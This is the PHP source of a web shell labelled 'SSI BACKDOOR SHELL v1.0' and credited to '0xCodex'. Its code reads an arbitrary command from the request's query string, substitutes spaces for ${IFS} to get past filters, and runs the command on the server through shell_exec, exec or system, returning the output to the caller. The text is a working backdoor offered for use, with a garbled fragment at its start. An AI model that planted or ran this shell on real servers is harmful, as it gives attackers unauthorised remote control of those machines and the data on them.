Created by: 0xCodex
RESTART
REFRESH
SHUTDOWN
SSI BACKDOOR SHELL v1.0
#!/usr/bin/phtml &1'); } if (empty($output) && function_exists('exec')) { @exec($cmd . ' 2>&1', $exec_out); $output = implode("\n", $exec_out); } if (empty($output) && function_exists('system')) { ob_start(); @system($cmd . ' 2>&1'); $output = ob_get_clean(); } if (empty($output) && $output !== "0") { $output = "❖ Command Executed Successfully"; } header('Content-Type: text/plain'); echo $output; exit; } $output_result = ""; $last_command = ""; $raw_cmd = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : ''; if (!empty($raw_cmd)) { $last_command = urldecode($raw_cmd); $last_command = str_replace('${IFS}', ' ', $last_command); $last_command = trim($last_command); } else { $last_command = ""; } if (!empty($last_command)) { if (function_exists('shell_exec')) { $output_result = @shell_exec($last_command . ' 2>&1'); } if (empty($output_result) && function_exists('exec')) { @exec($last_command . ' 2>&1', $exec_out); $output_result = implode("\n", $exec_out); } if (empty($output_result) && function_exists('system')) { ob_start(); @system($last_command . ' 2>&1'); $output_result = ob_get_clean(); } if (empty($output_result)) { $output_result = "[!] No output from: " . htmlspecialchars($last_command); } } $display_output = nl2br(htmlspecialchars($output_result)); ?>